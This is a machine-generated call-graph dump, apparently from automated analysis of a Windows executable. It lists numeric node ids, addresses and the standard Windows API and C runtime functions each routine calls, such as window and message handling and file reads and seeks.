52 API calls 86757->86758 86759 4014c8 86758->86759 86759->86752 86760 402160 52 API calls 86759->86760 86761 4014ee 86760->86761 86761->86589 86763 428361 86762->86763 86764 4103fc LoadImageW RegisterClassExW 86762->86764 87723 44395e EnumResourceNamesW LoadImageW 86763->87723 87722 410490 7 API calls 86764->87722 86767 40d651 86769 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86767->86769 86768 428368 86769->86601 86771 409202 86770->86771 86772 42d7ad 86770->86772 86828 409216 ctype 86771->86828 87986 410940 331 API calls 86771->87986 87989 45e737 90 API calls 3 library calls 86772->87989 86775 409386 86776 40939c 86775->86776 87987 40f190 10 API calls 86775->87987 86776->86604 86836 401000 Shell_NotifyIconW __localtime64_s 86776->86836 86778 4095b2 86778->86776 86780 4095bf 86778->86780 86779 409253 PeekMessageW 86779->86828 87988 401a50 331 API calls 86780->87988 86782 42d8cd Sleep 86782->86828 86783 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86783->86776 86784 4095f9 86783->86784 86788 42e158 TranslateMessage DispatchMessageW GetMessageW 86784->86788 86786 42e13b 88007 40d410 VariantClear 86786->88007 86788->86788 86790 42e188 86788->86790 86790->86776 86792 409567 PeekMessageW 86792->86828 86794 46f3c1 107 API calls 86794->86828 86795 40e0a0 52 API calls 86795->86828 86796 46fdbf 108 API calls 86835 4094e0 86796->86835 86797 409551 TranslateMessage DispatchMessageW 86797->86792 86799 42dcd2 WaitForSingleObject 86804 42dcf0 GetExitCodeProcess CloseHandle 86799->86804 86799->86828 86801 44c29d 52 API calls 86801->86835 86802 42dd3d Sleep 86802->86835 86803 47d33e 309 API calls 86803->86828 87996 40d410 VariantClear 86804->87996 86807 4094cf Sleep 86807->86835 86809 42d94d timeGetTime 87992 465124 53 API calls 86809->87992 86811 40d410 VariantClear 86811->86828 86812 40c620 timeGetTime 86812->86835 86814 465124 53 API calls 86814->86835 86816 42dd89 CloseHandle 86816->86835 86817 408f40 VariantClear 86817->86835 86819 42de19 GetExitCodeProcess CloseHandle 86819->86835 86821 42de88 Sleep 86821->86828 86825 45e737 90 API calls 86825->86828 86828->86775 86828->86779 86828->86782 86828->86786 86828->86792 86828->86794 86828->86795 86828->86797 86828->86799 86828->86802 86828->86803 86828->86807 86828->86809 86828->86811 86828->86825 86829 42e0cc VariantClear 86828->86829 86830 408f40 VariantClear 86828->86830 86828->86835 87724 4091b0 86828->87724 87782 40afa0 86828->87782 87808 408fc0 86828->87808 87843 408cc0 86828->87843 87857 4096a0 86828->87857 87984 40d150 TranslateAcceleratorW 86828->87984 87985 40d170 IsDialogMessageW GetClassLongW 86828->87985 87990 465124 53 API calls 86828->87990 87991 40c620 timeGetTime 86828->87991 88006 40e270 VariantClear ctype 86828->88006 86829->86828 86830->86828 86831 401b10 52 API calls 86831->86835 86833 401980 53 API calls 86833->86835 86835->86796 86835->86801 86835->86812 86835->86814 86835->86816 86835->86817 86835->86819 86835->86821 86835->86828 86835->86831 86835->86833 87993 45178a 54 API calls 86835->87993 87994 47d33e 331 API calls 86835->87994 87995 453bc6 54 API calls 86835->87995 87997 40d410 VariantClear 86835->87997 87998 443d19 67 API calls _wcslen 86835->87998 87999 4574b4 VariantClear 86835->87999 88000 403cd0 86835->88000 88004 4731e1 VariantClear 86835->88004 88005 4331a2 6 API calls 86835->88005 86836->86604 86837->86589 86838->86595 86840 401b16 _wcslen 86839->86840 86841 4115d7 52 API calls 86840->86841 86844 401b63 86840->86844 86842 401b4b _memmove 86841->86842 86843 4115d7 52 API calls 86842->86843 86843->86844 86845 40d200 52 API calls 2 library calls 86844->86845 86845->86611 86846->86614 86848 40bc70 52 API calls 86847->86848 86849 401f31 86848->86849 86850 402560 86849->86850 86851 40256d __write_nolock 86850->86851 86852 402160 52 API calls 86851->86852 86853 402593 86852->86853 86864 4025bd 86853->86864 86925 401c90 86853->86925 86855 4026f0 52 API calls 86855->86864 86856 4026a7 86857 401b10 52 API calls 86856->86857 86863 4026db 86856->86863 86859 4026d1 86857->86859 86858 401b10 52 API calls 86858->86864 86929 40d7c0 52 API calls 2 library calls 86859->86929 86860 401c90 52 API calls 86860->86864 86863->86669 86864->86855 86864->86856 86864->86858 86864->86860 86928 40d7c0 52 API calls 2 library calls 86864->86928 86930 40f760 86865->86930 86868 410118 86868->86671 86870 42805d 86873 42806a 86870->86873 86986 431e58 86870->86986 86872 413748 _free 46 API calls 86874 428078 86872->86874 86873->86872 86875 431e58 82 API calls 86874->86875 86876 428084 86875->86876 86876->86671 86878 4115d7 52 API calls 86877->86878 86879 401f74 86878->86879 86879->86674 86881 4019a3 86880->86881 86882 401985 86880->86882 86881->86882 86883 4019b8 86881->86883 86885 40199f 86882->86885 87592 403e10 53 API calls 86882->87592 87593 403e10 53 API calls 86883->87593 86885->86677 86887 4019c4 86887->86677 86889 40c2c7 86888->86889 86890 40c30e 86888->86890 86891 40c2d3 86889->86891 86892 426c79 86889->86892 86893 40c315 86890->86893 86894 426c2b 86890->86894 87594 403ea0 52 API calls __cinit 86891->87594 87599 4534e3 52 API calls 86892->87599 86898 40c321 86893->86898 86899 426c5a 86893->86899 86896 426c4b 86894->86896 86897 426c2e 86894->86897 87597 4534e3 52 API calls 86896->87597 86905 40c2de 86897->86905 87596 4534e3 52 API calls 86897->87596 87595 403ea0 52 API calls __cinit 86898->87595 87598 4534e3 52 API calls 86899->87598 86905->86687 86907 401a30 86906->86907 86908 401a17 86906->86908 86910 402160 52 API calls 86907->86910 86909 401a2d 86908->86909 87600 403c30 52 API calls _memmove 86908->87600 86909->86691 86912 401a3d 86910->86912 86912->86691 86914 411523 86913->86914 86915 4114ba 86913->86915 87603 4113a8 58 API calls 3 library calls 86914->87603 86920 40200c 86915->86920 87601 417f77 46 API calls __getptd_noexit 86915->87601 86918 4114c6 87602 417f25 10 API calls _W_expandtime 86918->87602 86920->86694 86920->86695 86921->86723 86922->86725 86923->86730 86924->86730 86926 4026f0 52 API calls 86925->86926 86927 401c97 86926->86927 86927->86853 86928->86864 86929->86863 86990 40f6f0 86930->86990 86932 40f77b _strcat ctype 86998 40f850 86932->86998 86937 427c2a 87028 414d04 86937->87028 86939 40f7fc 86939->86937 86941 40f804 86939->86941 87015 414a46 86941->87015 86945 40f80e 86945->86868 86949 4528bd 86945->86949 86946 427c59 87034 414fe2 86946->87034 86948 427c79 86950 4150d1 _fseek 81 API calls 86949->86950 86951 452930 86950->86951 87534 452719 86951->87534 86954 452948 86954->86870 86955 414d04 __fread_nolock 61 API calls 86956 452966 86955->86956 86957 414d04 __fread_nolock 61 API calls 86956->86957 86958 452976 86957->86958 86959 414d04 __fread_nolock 61 API calls 86958->86959 86960 45298f 86959->86960 86961 414d04 __fread_nolock 61 API calls 86960->86961 86962 4529aa 86961->86962 86963 4150d1 _fseek 81 API calls 86962->86963 86964 4529c4 86963->86964 86965 4135bb _malloc 46 API calls 86964->86965 86966 4529cf 86965->86966 86967 4135bb _malloc 46 API calls 86966->86967 86968 4529db 86967->86968 86969 414d04 __fread_nolock 61 API calls 86968->86969 86970 4529ec 86969->86970 86971 44afef GetSystemTimeAsFileTime 86970->86971 86972 452a00 86971->86972 86973 452a36 86972->86973 86974 452a13 86972->86974 86976 452aa5 86973->86976 86977 452a3c 86973->86977 86975 413748 _free 46 API calls 86974->86975 86978 452a1c 86975->86978 86980 413748 _free 46 API calls 86976->86980 87540 44b1a9 86977->87540 86981 413748 _free 46 API calls 86978->86981 86983 452aa3 86980->86983 86984 452a25 86981->86984 86982 452a9d 86985 413748 _free 46 API calls 86982->86985 86983->86870 86984->86870 86985->86983 86987 431e64 86986->86987 86989 431e6a 86986->86989 86988 414a46 __fcloseall 82 API calls 86987->86988 86988->86989 86989->86873 86991 425de2 86990->86991 86992 40f6fc _wcslen 86990->86992 86991->86932 86993 40f710 WideCharToMultiByte 86992->86993 86994 40f756 86993->86994 86995 40f728 86993->86995 86994->86932 86996 4115d7 52 API calls 86995->86996 86997 40f735 WideCharToMultiByte 86996->86997 86997->86932 87000 40f85d __localtime64_s _strlen 86998->87000 86999 426b3b 87000->86999 87002 40f7ab 87000->87002 87047 414db8 87000->87047 87003 4149c2 87002->87003 87062 414904 87003->87062 87005 40f7e9 87005->86937 87006 40f5c0 87005->87006 87007 40f5cd _strcat __write_nolock _memmove 87006->87007 87008 414d04 __fread_nolock 61 API calls 87007->87008 87010 425d11 87007->87010 87014 40f691 __tzset_nolock 87007->87014 87150 4150d1 87007->87150 87008->87007 87011 4150d1 _fseek 81 API calls 87010->87011 87012 425d33 87011->87012 87013 414d04 __fread_nolock 61 API calls 87012->87013 87013->87014 87014->86939 87016 414a52 _doexit 87015->87016 87017 414a64 87016->87017 87018 414a79 87016->87018 87290 417f77 46 API calls __getptd_noexit 87017->87290 87020 415471 __lock_file 47 API calls 87018->87020 87025 414a74 _doexit 87018->87025 87023 414a92 87020->87023 87021 414a69 87291 417f25 10 API calls _W_expandtime 87021->87291 87274 4149d9 87023->87274 87025->86945 87359 414c76 87028->87359 87030 414d1c 87031 44afef 87030->87031 87527 442c5a 87031->87527 87033 44b00d 87033->86946 87035 414fee _doexit 87034->87035 87036 414ffa 87035->87036 87037 41500f 87035->87037 87531 417f77 46 API calls __getptd_noexit 87036->87531 87038 415471 __lock_file 47 API calls 87037->87038 87041 415017 87038->87041 87040 414fff 87532 417f25 10 API calls _W_expandtime 87040->87532 87043 414e4e __ftell_nolock 51 API calls 87041->87043 87044 415024 87043->87044 87533 41503d LeaveCriticalSection LeaveCriticalSection _fseek 87044->87533 87046 41500a _doexit 87046->86948 87048 414dd6 87047->87048 87049 414deb 87047->87049 87058 417f77 46 API calls __getptd_noexit 87048->87058 87049->87048 87050 414df2 87049->87050 87060 41b91b 79 API calls 12 library calls 87050->87060 87053 414ddb 87059 417f25 10 API calls _W_expandtime 87053->87059 87055 414e18 87056 414de6 87055->87056 87061 418f98 77 API calls 6 library calls 87055->87061 87056->87000 87058->87053 87059->87056 87060->87055 87061->87056 87065 414910 _doexit 87062->87065 87063 414923 87118 417f77 46 API calls __getptd_noexit 87063->87118 87065->87063 87067 414951 87065->87067 87066 414928 87119 417f25 10 API calls _W_expandtime 87066->87119 87081 41d4d1 87067->87081 87070 414956 87071 41496a 87070->87071 87072 41495d 87070->87072 87073 414992 87071->87073 87074 414972 87071->87074 87120 417f77 46 API calls __getptd_noexit 87072->87120 87098 41d218 87073->87098 87121 417f77 46 API calls __getptd_noexit 87074->87121 87078 414933 _doexit @_EH4_CallFilterFunc@8 87078->87005 87082 41d4dd _doexit 87081->87082 87083 4182cb __lock 46 API calls 87082->87083 87096 41d4eb 87083->87096 87084 41d560 87123 41d5fb 87084->87123 87085 41d567 87086 416b04 __malloc_crt 46 API calls 87085->87086 87089 41d56e 87086->87089 87088 41d5f0 _doexit 87088->87070 87089->87084 87090 41d57c InitializeCriticalSectionAndSpinCount 87089->87090 87091 41d59c 87090->87091 87092 41d5af EnterCriticalSection 87090->87092 87095 413748 _free 46 API calls 87091->87095 87092->87084 87093 418209 __mtinitlocknum 46 API calls 87093->87096 87095->87084 87096->87084 87096->87085 87096->87093 87126 4154b2 47 API calls __lock 87096->87126 87127 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87096->87127 87099 41d23a 87098->87099 87100 41d255 87099->87100 87112 41d26c __wopenfile 87099->87112 87132 417f77 46 API calls __getptd_noexit 87100->87132 87101 41d421 87105 41d47a 87101->87105 87106 41d48c 87101->87106 87103 41d25a 87133 417f25 10 API calls _W_expandtime 87103->87133 87137 417f77 46 API calls __getptd_noexit 87105->87137 87129 422bf9 87106->87129 87109 41d47f 87138 417f25 10 API calls _W_expandtime 87109->87138 87110 41499d 87122 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 87110->87122 87112->87101 87112->87105 87134 41341f 58 API calls 2 library calls 87112->87134 87114 41d41a 87114->87101 87135 41341f 58 API calls 2 library calls 87114->87135 87116 41d439 87116->87101 87136 41341f 58 API calls 2 library calls 87116->87136 87118->87066 87119->87078 87120->87078 87121->87078 87122->87078 87128 4181f2 LeaveCriticalSection 87123->87128 87125 41d602 87125->87088 87126->87096 87127->87096 87128->87125 87139 422b35 87129->87139 87131 422c14 87131->87110 87132->87103 87133->87110 87134->87114 87135->87116 87136->87101 87137->87109 87138->87110 87140 422b41 _doexit 87139->87140 87141 422b54 87140->87141 87143 422b8a 87140->87143 87142 417f77 _W_expandtime 46 API calls 87141->87142 87144 422b59 87142->87144 87145 422400 __tsopen_nolock 109 API calls 87143->87145 87146 417f25 _W_expandtime 10 API calls 87144->87146 87147 422ba4 87145->87147 87149 422b63 _doexit 87146->87149 87148 422bcb __wsopen_helper LeaveCriticalSection 87147->87148 87148->87149 87149->87131 87153 4150dd _doexit 87150->87153 87151 4150e9 87181 417f77 46 API calls __getptd_noexit 87151->87181 87153->87151 87154 41510f 87153->87154 87163 415471 87154->87163 87155 4150ee 87182 417f25 10 API calls _W_expandtime 87155->87182 87162 4150f9 _doexit 87162->87007 87164 415483 87163->87164 87165 4154a5 EnterCriticalSection 87163->87165 87164->87165 87167 41548b 87164->87167 87166 415117 87165->87166 87169 415047 87166->87169 87168 4182cb __lock 46 API calls 87167->87168 87168->87166 87170 415067 87169->87170 87171 415057 87169->87171 87176 415079 87170->87176 87184 414e4e 87170->87184 87239 417f77 46 API calls __getptd_noexit 87171->87239 87175 41505c 87183 415143 LeaveCriticalSection LeaveCriticalSection _fseek 87175->87183 87201 41443c 87176->87201 87179 4150b9 87214 41e1f4 87179->87214 87181->87155 87182->87162 87183->87162 87185 414e61 87184->87185 87186 414e79 87184->87186 87240 417f77 46 API calls __getptd_noexit 87185->87240 87188 414139 __fputwc_nolock 46 API calls 87186->87188 87190 414e80 87188->87190 87189 414e66 87241 417f25 10 API calls _W_expandtime 87189->87241 87192 41e1f4 __write 51 API calls 87190->87192 87193 414e97 87192->87193 87194 414f09 87193->87194 87196 414ec9 87193->87196 87200 414e71 87193->87200 87242 417f77 46 API calls __getptd_noexit 87194->87242 87197 41e1f4 __write 51 API calls 87196->87197 87196->87200 87198 414f64 87197->87198 87199 41e1f4 __write 51 API calls 87198->87199 87198->87200 87199->87200 87200->87176 87202 414455 87201->87202 87206 414477 87201->87206 87203 414139 __fputwc_nolock 46 API calls 87202->87203 87202->87206 87204 414470 87203->87204 87243 41b7b2 77 API calls 6 library calls 87204->87243 87207 414139 87206->87207 87208 414145 87207->87208 87209 41415a 87207->87209 87244 417f77 46 API calls __getptd_noexit 87208->87244 87209->87179 87211 41414a 87245 417f25 10 API calls _W_expandtime 87211->87245 87213 414155 87213->87179 87215 41e200 _doexit 87214->87215 87216 41e223 87215->87216 87217 41e208 87215->87217 87218 41e22f 87216->87218 87223 41e269 87216->87223 87266 417f8a 46 API calls __getptd_noexit 87217->87266 87268 417f8a 46 API calls __getptd_noexit 87218->87268 87221 41e20d 87267 417f77 46 API calls __getptd_noexit 87221->87267 87222 41e234 87269 417f77 46 API calls __getptd_noexit 87222->87269 87246 41ae56 87223->87246 87227 41e215 _doexit 87227->87175 87228 41e23c 87270 417f25 10 API calls _W_expandtime 87228->87270 87229 41e26f 87231 41e291 87229->87231 87232 41e27d 87229->87232 87271 417f77 46 API calls __getptd_noexit 87231->87271 87256 41e17f 87232->87256 87235 41e296 87272 417f8a 46 API calls __getptd_noexit 87235->87272 87236 41e289 87273 41e2c0 LeaveCriticalSection __unlock_fhandle 87236->87273 87239->87175 87240->87189 87241->87200 87242->87200 87243->87206 87244->87211 87245->87213 87247 41ae62 _doexit 87246->87247 87248 41aebc 87247->87248 87250 4182cb __lock 46 API calls 87247->87250 87249 41aec1 EnterCriticalSection 87248->87249 87251 41aede _doexit 87248->87251 87249->87251 87252 41ae8e 87250->87252 87251->87229 87253 41aeaa 87252->87253 87254 41ae97 InitializeCriticalSectionAndSpinCount 87252->87254 87255 41aeec ___lock_fhandle LeaveCriticalSection 87253->87255 87254->87253 87255->87248 87257 41aded __lseeki64_nolock 46 API calls 87256->87257 87258 41e18e 87257->87258 87259 41e1a4 SetFilePointer 87258->87259 87260 41e194 87258->87260 87262 41e1c3 87259->87262 87263 41e1bb GetLastError 87259->87263 87261 417f77 _W_expandtime 46 API calls 87260->87261 87264 41e199 87261->87264 87262->87264 87265 417f9d __dosmaperr 46 API calls 87262->87265 87263->87262 87264->87236 87265->87264 87266->87221 87267->87227 87268->87222 87269->87228 87270->87227 87271->87235 87272->87236 87273->87227 87275 4149ea 87274->87275 87276 4149fe 87274->87276 87320 417f77 46 API calls __getptd_noexit 87275->87320 87277 4149fa 87276->87277 87279 41443c __flush 77 API calls 87276->87279 87292 414ab2 LeaveCriticalSection LeaveCriticalSection _fseek 87277->87292 87282 414a0a 87279->87282 87280 4149ef 87321 417f25 10 API calls _W_expandtime 87280->87321 87293 41d8c2 87282->87293 87285 414139 __fputwc_nolock 46 API calls 87286 414a18 87285->87286 87297 41d7fe 87286->87297 87288 414a1e 87288->87277 87289 413748 _free 46 API calls 87288->87289 87289->87277 87290->87021 87291->87025 87292->87025 87294 41d8d2 87293->87294 87296 414a12 87293->87296 87295 413748 _free 46 API calls 87294->87295 87294->87296 87295->87296 87296->87285 87298 41d80a _doexit 87297->87298 87299 41d812 87298->87299 87300 41d82d 87298->87300 87337 417f8a 46 API calls __getptd_noexit 87299->87337 87302 41d839 87300->87302 87306 41d873 87300->87306 87339 417f8a 46 API calls __getptd_noexit 87302->87339 87303 41d817 87338 417f77 46 API calls __getptd_noexit 87303->87338 87305 41d83e 87340 417f77 46 API calls __getptd_noexit 87305->87340 87309 41ae56 ___lock_fhandle 48 API calls 87306->87309 87312 41d879 87309->87312 87310 41d81f _doexit 87310->87288 87311 41d846 87341 417f25 10 API calls _W_expandtime 87311->87341 87314 41d893 87312->87314 87315 41d887 87312->87315 87342 417f77 46 API calls __getptd_noexit 87314->87342 87322 41d762 87315->87322 87318 41d88d 87343 41d8ba LeaveCriticalSection __unlock_fhandle 87318->87343 87320->87280 87321->87277 87344 41aded 87322->87344 87324 41d772 87325 41d7c8 87324->87325 87326 41d7a6 87324->87326 87328 41aded __lseeki64_nolock 46 API calls 87324->87328 87357 41ad67 47 API calls 2 library calls 87325->87357 87326->87325 87329 41aded __lseeki64_nolock 46 API calls 87326->87329 87332 41d79d 87328->87332 87333 41d7b2 CloseHandle 87329->87333 87330 41d7d0 87331 41d7f2 87330->87331 87358 417f9d 46 API calls 3 library calls 87330->87358 87331->87318 87335 41aded __lseeki64_nolock 46 API calls 87332->87335 87333->87325 87336 41d7be GetLastError 87333->87336 87335->87326 87336->87325 87337->87303 87338->87310 87339->87305 87340->87311 87341->87310 87342->87318 87343->87310 87345 41ae12 87344->87345 87346 41adfa 87344->87346 87349 417f8a __close 46 API calls 87345->87349 87350 41ae51 87345->87350 87347 417f8a __close 46 API calls 87346->87347 87348 41adff 87347->87348 87351 417f77 _W_expandtime 46 API calls 87348->87351 87352 41ae23 87349->87352 87350->87324 87356 41ae07 87351->87356 87353 417f77 _W_expandtime 46 API calls 87352->87353 87354 41ae2b 87353->87354 87355 417f25 _W_expandtime 10 API calls 87354->87355 87355->87356 87356->87324 87357->87330 87358->87331 87360 414c82 _doexit 87359->87360 87361 414cc3 87360->87361 87362 414c96 __localtime64_s 87360->87362 87363 414cbb _doexit 87360->87363 87364 415471 __lock_file 47 API calls 87361->87364 87386 417f77 46 API calls __getptd_noexit 87362->87386 87363->87030 87366 414ccb 87364->87366 87372 414aba 87366->87372 87367 414cb0 87387 417f25 10 API calls _W_expandtime 87367->87387 87376 414ad8 __localtime64_s 87372->87376 87379 414af2 87372->87379 87373 414ae2 87439 417f77 46 API calls __getptd_noexit 87373->87439 87375 414ae7 87440 417f25 10 API calls _W_expandtime 87375->87440 87376->87373 87376->87379 87383 414b2d 87376->87383 87388 414cfa LeaveCriticalSection LeaveCriticalSection _fseek 87379->87388 87380 414c38 __localtime64_s 87442 417f77 46 API calls __getptd_noexit 87380->87442 87381 414139 __fputwc_nolock 46 API calls 87381->87383 87383->87379 87383->87380 87383->87381 87389 41dfcc 87383->87389 87419 41d8f3 87383->87419 87441 41e0c2 46 API calls 3 library calls 87383->87441 87386->87367 87387->87363 87388->87363 87390 41dfd8 _doexit 87389->87390 87391 41dfe0 87390->87391 87392 41dffb 87390->87392 87512 417f8a 46 API calls __getptd_noexit 87391->87512 87393 41e007 87392->87393 87399 41e041 87392->87399 87514 417f8a 46 API calls __getptd_noexit 87393->87514 87395 41dfe5 87513 417f77 46 API calls __getptd_noexit 87395->87513 87398 41e00c 87515 417f77 46 API calls __getptd_noexit 87398->87515 87400 41e063 87399->87400 87401 41e04e 87399->87401 87404 41ae56 ___lock_fhandle 48 API calls 87400->87404 87517 417f8a 46 API calls __getptd_noexit 87401->87517 87407 41e069 87404->87407 87405 41e014 87516 417f25 10 API calls _W_expandtime 87405->87516 87406 41e053 87518 417f77 46 API calls __getptd_noexit 87406->87518 87410 41e077 87407->87410 87411 41e08b 87407->87411 87409 41dfed _doexit 87409->87383 87443 41da15 87410->87443 87519 417f77 46 API calls __getptd_noexit 87411->87519 87415 41e083 87521 41e0ba LeaveCriticalSection __unlock_fhandle 87415->87521 87416 41e090 87520 417f8a 46 API calls __getptd_noexit 87416->87520 87420 41d900 87419->87420 87424 41d915 87419->87424 87525 417f77 46 API calls __getptd_noexit 87420->87525 87422 41d905 87526 417f25 10 API calls _W_expandtime 87422->87526 87425 41d910 87424->87425 87426 41d94a 87424->87426 87522 420603 87424->87522 87425->87383 87428 414139 __fputwc_nolock 46 API calls 87426->87428 87429 41d95e 87428->87429 87430 41dfcc __read 59 API calls 87429->87430 87431 41d965 87430->87431 87431->87425 87432 414139 __fputwc_nolock 46 API calls 87431->87432 87433 41d988 87432->87433 87433->87425 87434 414139 __fputwc_nolock 46 API calls 87433->87434 87435 41d994 87434->87435 87435->87425 87436 414139 __fputwc_nolock 46 API calls 87435->87436 87437 41d9a1 87436->87437 87438 414139 __fputwc_nolock 46 API calls 87437->87438 87438->87425 87439->87375 87440->87379 87441->87383 87442->87375 87444 41da31 87443->87444 87445 41da4c 87443->87445 87447 417f8a __close 46 API calls 87444->87447 87446 41da5b 87445->87446 87449 41da7a 87445->87449 87450 417f8a __close 46 API calls 87446->87450 87448 41da36 87447->87448 87451 417f77 _W_expandtime 46 API calls 87448->87451 87453 41da98 87449->87453 87464 41daac 87449->87464 87452 41da60 87450->87452 87465 41da3e 87451->87465 87455 417f77 _W_expandtime 46 API calls 87452->87455 87456 417f8a __close 46 API calls 87453->87456 87454 41db02 87458 417f8a __close 46 API calls 87454->87458 87457 41da67 87455->87457 87459 41da9d 87456->87459 87461 417f25 _W_expandtime 10 API calls 87457->87461 87462 41db07 87458->87462 87460 417f77 _W_expandtime 46 API calls 87459->87460 87463 41daa4 87460->87463 87461->87465 87466 417f77 _W_expandtime 46 API calls 87462->87466 87468 417f25 _W_expandtime 10 API calls 87463->87468 87464->87454 87464->87465 87467 41dae1 87464->87467 87470 41db1b 87464->87470 87465->87415 87466->87463 87467->87454 87469 41daec ReadFile 87467->87469 87468->87465 87474 41dc17 87469->87474 87475 41df8f GetLastError 87469->87475 87472 416b04 __malloc_crt 46 API calls 87470->87472 87473 41db31 87472->87473 87478 41db59 87473->87478 87479 41db3b 87473->87479 87474->87475 87483 41dc2b 87474->87483 87476 41de16 87475->87476 87477 41df9c 87475->87477 87487 417f9d __dosmaperr 46 API calls 87476->87487 87491 41dd9b 87476->87491 87481 417f77 _W_expandtime 46 API calls 87477->87481 87480 420494 __lseeki64_nolock 48 API calls 87478->87480 87482 417f77 _W_expandtime 46 API calls 87479->87482 87484 41db67 87480->87484 87485 41dfa1 87481->87485 87486 41db40 87482->87486 87483->87491 87497 41de5b 87483->87497 87499 41dc47 87483->87499 87484->87469 87488 417f8a __close 46 API calls 87485->87488 87489 417f8a __close 46 API calls 87486->87489 87487->87491 87488->87491 87489->87465 87490 413748 _free 46 API calls 87490->87465 87491->87465 87491->87490 87492 41dcab ReadFile 87496 41dcc9 GetLastError 87492->87496 87503 41dcd3 87492->87503 87493 41ded0 ReadFile 87494 41deef GetLastError 87493->87494 87504 41def9 87493->87504 87494->87497 87494->87504 87495 41ddec MultiByteToWideChar 87495->87491 87498 41de10 GetLastError 87495->87498 87496->87499 87496->87503 87497->87491 87497->87493 87498->87476 87499->87492 87500 41dd28 87499->87500 87500->87491 87501 41dda3 87500->87501 87502 41dd96 87500->87502 87506 41dd60 87500->87506 87501->87506 87507 41ddda 87501->87507 87505 417f77 _W_expandtime 46 API calls 87502->87505 87503->87499 87508 420494 __lseeki64_nolock 48 API calls 87503->87508 87504->87497 87509 420494 __lseeki64_nolock 48 API calls 87504->87509 87505->87491 87506->87495 87510 420494 __lseeki64_nolock 48 API calls 87507->87510 87508->87503 87509->87504 87511 41dde9 87510->87511 87511->87495 87512->87395 87513->87409 87514->87398 87515->87405 87516->87409 87517->87406 87518->87405 87519->87416 87520->87415 87521->87409 87523 416b04 __malloc_crt 46 API calls 87522->87523 87524 420618 87523->87524 87524->87426 87525->87422 87526->87425 87530 4148b3 GetSystemTimeAsFileTime __aulldiv 87527->87530 87529 442c6b 87529->87033 87530->87529 87531->87040 87532->87046 87533->87046 87535 45272f __tzset_nolock _wcscpy 87534->87535 87536 414d04 61 API calls __fread_nolock 87535->87536 87537 44afef GetSystemTimeAsFileTime 87535->87537 87538 4528a4 87535->87538 87539 4150d1 81 API calls _fseek 87535->87539 87536->87535 87537->87535 87538->86954 87538->86955 87539->87535 87541 44b1bc 87540->87541 87542 44b1ca 87540->87542 87543 4149c2 116 API calls 87541->87543 87544 44b1e1 87542->87544 87545 44b1d8 87542->87545 87546 4149c2 116 API calls 87542->87546 87543->87542 87575 4321a4 87544->87575 87545->86982 87548 44b2db 87546->87548 87548->87544 87550 44b2e9 87548->87550 87549 44b224 87551 44b253 87549->87551 87552 44b228 87549->87552 87553 44b2f6 87550->87553 87555 414a46 __fcloseall 82 API calls 87550->87555 87579 43213d 87551->87579 87554 44b235 87552->87554 87558 414a46 __fcloseall 82 API calls 87552->87558 87553->86982 87559 44b245 87554->87559 87562 414a46 __fcloseall 82 API calls 87554->87562 87555->87553 87557 44b25a 87560 44b260 87557->87560 87561 44b289 87557->87561 87558->87554 87559->86982 87563 44b26d 87560->87563 87565 414a46 __fcloseall 82 API calls 87560->87565 87589 44b0bf 87 API calls 87561->87589 87562->87559 87566 44b27d 87563->87566 87568 414a46 __fcloseall 82 API calls 87563->87568 87565->87563 87566->86982 87567 44b28f 87590 4320f8 46 API calls _free 87567->87590 87568->87566 87570 44b295 87571 44b2a2 87570->87571 87572 414a46 __fcloseall 82 API calls 87570->87572 87573 44b2b2 87571->87573 87574 414a46 __fcloseall 82 API calls 87571->87574 87572->87571 87573->86982 87574->87573 87576 4321b4 __tzset_nolock _memmove 87575->87576 87577 4321cb 87575->87577 87576->87549 87578 414d04 __fread_nolock 61 API calls 87577->87578 87578->87576 87580 4135bb _malloc 46 API calls 87579->87580 87581 432150 87580->87581 87582 4135bb _malloc 46 API calls 87581->87582 87583 432162 87582->87583 87584 4135bb _malloc 46 API calls 87583->87584 87585 432174 87584->87585 87587 432189 87585->87587 87591 4320f8 46 API calls _free 87585->87591 87587->87557 87588 432198 87588->87557 87589->87567 87590->87570 87591->87588 87592->86885 87593->86887 87594->86905 87595->86905 87596->86905 87597->86899 87598->86905 87599->86905 87600->86909 87601->86918 87602->86920 87603->86920 87653 410160 87604->87653 87606 41012f GetFullPathNameW 87607 410147 ctype 87606->87607 87607->86739 87609 4102cb SHGetDesktopFolder 87608->87609 87612 410333 _wcsncpy 87608->87612 87610 4102e0 _wcsncpy 87609->87610 87609->87612 87611 41031c SHGetPathFromIDListW 87610->87611 87610->87612 87611->87612 87612->86743 87614 425f4a 87613->87614 87615 4101bb 87613->87615 87618 4114ab __wcsicoll 58 API calls 87614->87618 87621 425f6e 87614->87621 87616 410160 52 API calls 87615->87616 87617 4101c7 87616->87617 87657 410200 52 API calls 2 library calls 87617->87657 87618->87614 87620 4101d6 87658 410200 52 API calls 2 library calls 87620->87658 87621->86745 87623 4101e9 87623->86745 87625 40f760 128 API calls 87624->87625 87626 40f584 87625->87626 87627 429335 87626->87627 87628 40f58c 87626->87628 87631 4528bd 118 API calls 87627->87631 87629 40f598 87628->87629 87630 429358 87628->87630 87683 4033c0 113 API calls 7 library calls 87629->87683 87684 434034 86 API calls _wprintf 87630->87684 87633 42934b 87631->87633 87637 429373 87633->87637 87638 42934f 87633->87638 87635 429369 87635->87637 87636 40f5b4 87636->86742 87639 4115d7 52 API calls 87637->87639 87640 431e58 82 API calls 87638->87640 87652 4293c5 ctype 87639->87652 87640->87630 87641 42959c 87642 413748 _free 46 API calls 87641->87642 87643 4295a5 87642->87643 87644 431e58 82 API calls 87643->87644 87645 4295b1 87644->87645 87649 401b10 52 API calls 87649->87652 87652->87641 87652->87649 87659 444af8 87652->87659 87662 44b41c 87652->87662 87669 402780 87652->87669 87677 4022d0 87652->87677 87685 44c7dd 64 API calls 3 library calls 87652->87685 87654 410167 _wcslen 87653->87654 87655 4115d7 52 API calls 87654->87655 87656 41017e _wcscpy 87655->87656 87656->87606 87657->87620 87658->87623 87660 4115d7 52 API calls 87659->87660 87661 444b27 _memmove 87660->87661 87661->87652 87663 44b429 87662->87663 87664 4115d7 52 API calls 87663->87664 87665 44b440 87664->87665 87666 44b45e 87665->87666 87667 401b10 52 API calls 87665->87667 87666->87652 87668 44b453 87667->87668 87668->87652 87670 402827 87669->87670 87673 402790 ctype _memmove 87669->87673 87672 4115d7 52 API calls 87670->87672 87671 4115d7 52 API calls 87674 402797 87671->87674 87672->87673 87673->87671 87675 4027bd 87674->87675 87676 4115d7 52 API calls 